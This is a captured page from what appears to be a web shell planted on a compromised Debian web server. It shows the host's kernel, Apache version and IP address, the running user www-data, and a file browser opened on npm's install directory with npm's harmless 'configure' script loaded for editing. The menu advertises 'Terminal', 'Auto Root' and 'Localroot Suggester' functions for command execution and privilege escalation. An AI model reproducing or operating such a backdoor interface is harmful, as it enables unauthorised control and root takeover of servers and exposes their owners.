Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
npm /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
docs
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
lib
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
man
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
node_modules
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
scripts
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
tap-snapshots
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
.licensee.json
245
B
-rw-r--r--
2023-02-16 16:16
.mailmap
3.2
KB
-rw-r--r--
2023-02-16 16:16
.npmignore
368
B
-rw-r--r--
2023-02-16 16:16
.npmrc
0
B
-rw-r--r--
2021-10-14 07:50
.travis.yml
269
B
-rw-r--r--
2023-02-16 16:16
AUTHORS
26.73
KB
-rw-r--r--
2023-02-16 16:16
Makefile
3.85
KB
-rw-r--r--
2023-02-16 16:16
configure
529
B
-rwxr-xr-x
2023-02-16 16:16
make.bat
156
B
-rw-r--r--
2023-02-16 16:16
package.json
8.02
KB
-rw-r--r--
2023-02-16 16:16
Save
Rename
#!/usr/bin/env bash # set configurations that will be "sticky" on this system, # surviving npm self-updates. CONFIGS=() i=0 # get the location of this file. unset CDPATH CONFFILE=$(cd $(dirname "$0"); pwd -P)/npmrc while [ $# -gt 0 ]; do conf="$1" case $conf in --help) echo "./configure --param=value ..." exit 0 ;; --*) CONFIGS[$i]="${conf:2}" ;; *) CONFIGS[$i]="$conf" ;; esac let i++ shift done for c in "${CONFIGS[@]}"; do echo "$c" >> "$CONFFILE" done